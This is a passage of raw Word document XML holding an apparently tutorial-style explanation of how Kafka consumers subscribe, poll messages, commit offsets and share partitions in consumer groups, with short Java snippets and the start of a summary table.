        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribes to one or more topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076CAD07" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pulls messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F36A9E0" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>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Consumers work in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable and fault-tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FE964" w14:textId="77777777" w:rsidR="00BC62CE"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B946C9F">
          <v:rect id="_x0000_i3107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26497447" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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How Does a Kafka Consumer Consume Messages?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFE7E30" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Here’s the step-by-step working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403BF2B2" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>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Subscribe to a topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA68DC" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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consumer.subscribe(Collections.singletonList("orders"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5A3BB" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>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Poll the messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5196EE50" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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while (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26414170" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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    ConsumerRecords&lt;String, String&gt; records = consumer.poll(Duration.ofMillis(100));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30783F61" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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    for (ConsumerRecord&lt;String, String&gt; record : records) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10242FFA" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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        System.out.println(record.key() + " =&gt; " + record.value());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57514516" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D450D4" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632DCE2C" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>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Kafka broker returns messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from assigned partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B632B" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>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Messages are </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deserialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A286C1F" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1297"/>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Consumer </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commits offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to track what has been read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8B2B6" w14:textId="77777777" w:rsidR="00BC62CE"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817E9E6">
          <v:rect id="_x0000_i3108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7CB49B" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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What is an Offset?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54295288" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>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Kafka keeps track of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>which message</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the consumer has read using </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50501C66" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>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Offset = position of the record in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E4B99" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>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Committing offset = "I've processed this message."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886FE8E" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Two types of commits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE05C7D" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>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Auto-commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (enable.auto.commit=true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348E527" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>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Manual commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8BD66B" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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consumer.commitSync();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ADAB21" w14:textId="77777777" w:rsidR="00BC62CE"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8750A19">
          <v:rect id="_x0000_i3109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="728AC5F6" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Consumer Group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D95851" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1300"/>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Consumers in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same group</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> share the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1DEF45" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1300"/>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Kafka assigns </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions to consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40710DB9" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1300"/>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Each partition is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read by only one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C283C03" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If one consumer fails → another consumer in the group takes over its partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9315B5" w14:textId="77777777" w:rsidR="00BC62CE"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D11505A">
          <v:rect id="_x0000_i3110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB499B2" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A790C71" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Suppose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF2F88" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>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Topic orders has </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F3E23" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>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2 consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in group order-processors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F945E" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9B90D9" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>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Kafka will assign 2 partitions to Consumer-1 and 1 to Consumer-2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A109F3C" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:num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 xml:space="preserve">Each message in a partition will be read </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>once by one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB9A8CC" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00000000" w:rsidP="00E510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C445C6B">
          <v:rect id="_x0000_i3111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8D7872" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">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5"/>
        <w:gridCol w:w="4626"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="21B22384" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01527B32" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="544CCF1B" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="010A1D85" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A0942B0" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Kafka Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60503B91" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE"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Reads data from Kafka topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="3C5B2F14" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
